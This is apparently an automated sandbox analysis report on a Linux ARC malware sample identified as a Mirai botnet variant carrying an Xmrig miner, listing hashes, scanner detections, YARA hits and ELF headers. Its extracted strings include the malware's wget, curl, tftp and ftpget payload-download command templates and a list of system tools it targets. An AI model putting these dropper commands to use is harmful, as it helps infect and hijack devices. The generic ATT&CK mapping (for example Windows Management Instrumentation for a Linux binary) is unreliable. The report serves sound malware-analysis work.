Linux Analysis Report
morte.arc.elf

Overview

General Information

Sample name: morte.arc.elf
Analysis ID: 1729413
Has dependencies: false
MD5: cf40973b57fc3f9a4be3799ec8b4c57e
SHA1: f3aeeabaa88c8c098135d497cadcf3bde0558906
SHA256: 99d4a218e00c9b5ecc791eb6d52fd6ab3e55927d2cb8ccd9d1efd105d8198704
Tags: elf, user-abuse_ch
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Mirai, Xmrig
Score: 76
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Xmrig cryptocurrency miner
Found strings related to Crypto-Mining
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table

Classification

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1729413
Start date and time: 2025-07-06 08:04:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: morte.arc.elf
Detection: MAL
Classification: mal76.troj.mine.linELF@0/0@0/0
Command: /tmp/morte.arc.elf
PID: 5523
Exit Code: 255
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
Name / Description / Attribution / Blogpost URLs / Link:

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums", many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: XMRIG
Description:
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Yara matches (Source / Rule / Description / Author / Strings):
Source: morte.arc.elf, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security, Strings:
Source: morte.arc.elf, Rule: JoeSecurity_Mirai_3, Description: Yara detected Mirai, Author: Joe Security, Strings:

No Suricata rule has matched


AV Detection

Source: morte.arc.elf, Avira: detected
Source: morte.arc.elf, Virustotal: Detection: 34%
Source: morte.arc.elf, ReversingLabs: Detection: 38%

Bitcoin Miner

Source: Yara match, File source: morte.arc.elf, type: SAMPLE
Source: morte.arc.elf, String found in binary or memory: cryptonight
Source: morte.arc.elf, String: H^/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/data/local/tmp/var/mnt/root/boot/bin/sbin/home/dev
Source: morte.arc.elf, String: GFHICK"/var/run//mnt//root//var//var/tmp/arc%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s
Source: Initial sample, String containing 'busybox' found: /usr/sbin/busybox
Source: Initial sample, String containing 'busybox' found: /usr/bin/busybox
Source: Initial sample, String containing 'busybox' found: H^/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/data/local/tmp/var/mnt/root/boot/bin/sbin/home/dev
Source: ELF static info symbol of initial sample, .symtab present: no
Source: classification engine, Classification label: mal76.troj.mine.linELF@0/0@0/0

Stealing of Sensitive Information

Source: Yara match, File source: morte.arc.elf, type: SAMPLE

Remote Access Functionality

Source: Yara match, File source: morte.arc.elf, type: SAMPLE
ATT&CK matrix (tactic: technique):
Reconnaissance: Gather Victim Identity Information
Resource Development: 1 Scripting
Initial Access: Valid Accounts
Execution: Windows Management Instrumentation
Persistence: 1 Scripting
Privilege Escalation: Path Interception
Defense Evasion: Direct Volume Access
Credential Access: OS Credential Dumping
Discovery: System Service Discovery
Lateral Movement: Remote Services
Collection: Data from Local System
Command and Control: Data Obfuscation
Exfiltration: Exfiltration Over Other Network Medium
Impact: Abuse Accessibility Features
No configs have been found

Source          Detection  Scanner        Label
morte.arc.elf   34%        Virustotal
morte.arc.elf   39%        ReversingLabs  Linux.Worm.Mirai
morte.arc.elf   100%       Avira          LINUX/Mirai.bonb
No Antivirus matches
No contacted domains info
No contacted IP infos
No context
No created / dropped files found
File type: ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), statically linked, stripped
Entropy (8bit): 6.416032505550106
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: morte.arc.elf
File size: 124'644 bytes
MD5: cf40973b57fc3f9a4be3799ec8b4c57e
SHA1: f3aeeabaa88c8c098135d497cadcf3bde0558906
SHA256: 99d4a218e00c9b5ecc791eb6d52fd6ab3e55927d2cb8ccd9d1efd105d8198704
SHA512: 663b097fd02c054ec07bb057d2ffe2e13d27b2782d20b10abb79cb028505d449ececfbe3b226a9f4e20120b14f03e325a0c76a0723fe1c9fd7687e9ea95a11f6
SSDEEP: 3072:M3UVy9EaVDL2cNaHMxfukwOybXcRgxqC:MZvRwwf4fqC
TLSH: 5DC3AED7B78724A1C86247F007C74B9D2E63A201DE5BE9E76C0E663B197A0DF5A063C1
File Content Preview: .ELF..............].........4...........4. ...(.................................. ..................<............ ..................................................................Q.td.......................................................................

ELF header

Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
Machine: <unknown>
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x106c0
Flags: 0x403
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 5
Section Header Offset: 124084
Section Header Size: 40
Number of Section Headers: 14
Header String Table Index: 13
Section headers:

Name             Type         Address   Offset    Size      EntSize  Flags  Flags Description  Link  Info  Align
                 NULL         0x0       0x0       0x0       0x0      0x0                       0     0     0
.init            PROGBITS     0x10114   0x114     0x22      0x0      0x6    AX                 0     0     1
.text            PROGBITS     0x10138   0x138     0x13e08   0x0      0x6    AX                 0     0     4
.fini            PROGBITS     0x23f40   0x13f40   0x16      0x0      0x6    AX                 0     0     1
.rodata          PROGBITS     0x23f58   0x13f58   0x88b8    0x0      0x2    A                  0     0     4
.tbss            NOBITS       0x2ffe0   0x1dfe0   0x8       0x0      0x403  WAT                0     0     4
.fini_array      FINI_ARRAY   0x2ffe0   0x1dfe0   0x4       0x4      0x3    WA                 0     0     4
.ctors           PROGBITS     0x2ffe4   0x1dfe4   0x8       0x0      0x3    WA                 0     0     4
.dtors           PROGBITS     0x2ffec   0x1dfec   0x8       0x0      0x3    WA                 0     0     4
.got             PROGBITS     0x2fff4   0x1dff4   0x8       0x0      0x3    WA                 0     0     4
.data            PROGBITS     0x30008   0x1e008   0x414     0x0      0x3    WA                 0     0     4
.bss             NOBITS       0x3041c   0x1e41c   0xbc50    0x0      0x3    WA                 0     0     4
.ARC.attributes  <unknown>    0x0       0x1e41c   0x32      0x0      0x0                       0     0     1
.shstrtab        STRTAB       0x0       0x1e44e   0x65      0x0      0x0                       0     0     1

Program headers:

Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
LOAD       0x0      0x10000          0x10000           0x1c810    0x1c810      6.6487   0x5    R E                0x2000                    .init .text .fini .rodata
LOAD       0x1dfe0  0x2ffe0          0x2ffe0           0x43c      0xc08c       3.9810   0x6    RW                 0x2000                    .tbss .fini_array .ctors .dtors .got .data .bss
NOTE       0x0      0x0              0x0               0x0        0x0          0.0000   0x4    R                  0x4
TLS        0x1dfe0  0x2ffe0          0x2ffe0           0x0        0x8          0.0000   0x4    R                  0x4                       .tbss
GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x4
No network behavior found

System Behavior